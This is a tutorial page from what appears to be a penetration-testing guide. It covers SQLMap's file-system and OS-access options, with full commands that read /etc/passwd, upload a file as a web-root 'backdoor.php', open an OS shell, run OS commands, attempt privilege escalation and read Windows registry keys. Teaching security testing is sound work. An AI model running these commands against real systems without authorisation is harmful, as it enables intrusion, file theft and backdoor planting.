File System Access

Learn how to access the file system through SQL injection vulnerabilities using SQLMap

SQLMap can leverage SQL injection vulnerabilities to interact with the underlying file system of the database server. This capability varies depending on the database management system (DBMS) and the privileges of the database user.

Reading Files (--file-read)

To read files from the database server's file system:

sqlmap -u "http://www.example.com/vuln.php?id=1" --file-read="/etc/passwd"

This attempts to read the specified file from the server's file system. The file content will be stored in the SQLMap output directory.

Writing Files (--file-write and --file-dest)

To write files to the database server's file system:

sqlmap -u "http://www.example.com/vuln.php?id=1" --file-write="local_file.php" --file-dest="/var/www/html/backdoor.php"

This command:

Takes a local file (local_file.php)
Uploads it to the target server
Saves it at the specified destination path (/var/www/html/backdoor.php)

OS Shell Access (--os-shell)

SQLMap can attempt to gain operating system shell access:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell

This tries to leverage the SQL injection vulnerability to spawn a shell on the target system. SQLMap will attempt various techniques based on the DBMS:

For MySQL: Uses INTO OUTFILE to write a web shell
For Microsoft SQL Server: Uses xp_cmdshell
For PostgreSQL: Uses COPY TO/FROM or UDF injection
For Oracle: Uses Java or external table features

OS Command Execution (--os-cmd)

To execute a single operating system command:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="id"

This executes the specified command on the target system and returns the output.

Privilege Escalation

Some database systems allow for privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --privileges --is-dba

This checks if the current database user has administrative privileges. If not, SQLMap can sometimes attempt privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc

Registry Access (Windows)

On Windows systems, SQLMap can access the registry:

sqlmap -u "http://www.example.com/vuln.php?id=1" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

This reads the specified registry key from a Windows target system.

PreviousData Extraction

NextAdvanced Techniques

Penetration Testing Guide

Hashcat Guide

Hydra Guide

Nikto Guide

OWASP ZAP Guide

Burp Suite Guide

XSS Guide

SQLMap Guide

Reverse Shells Guide

John the Ripper Guide

Nmap Guide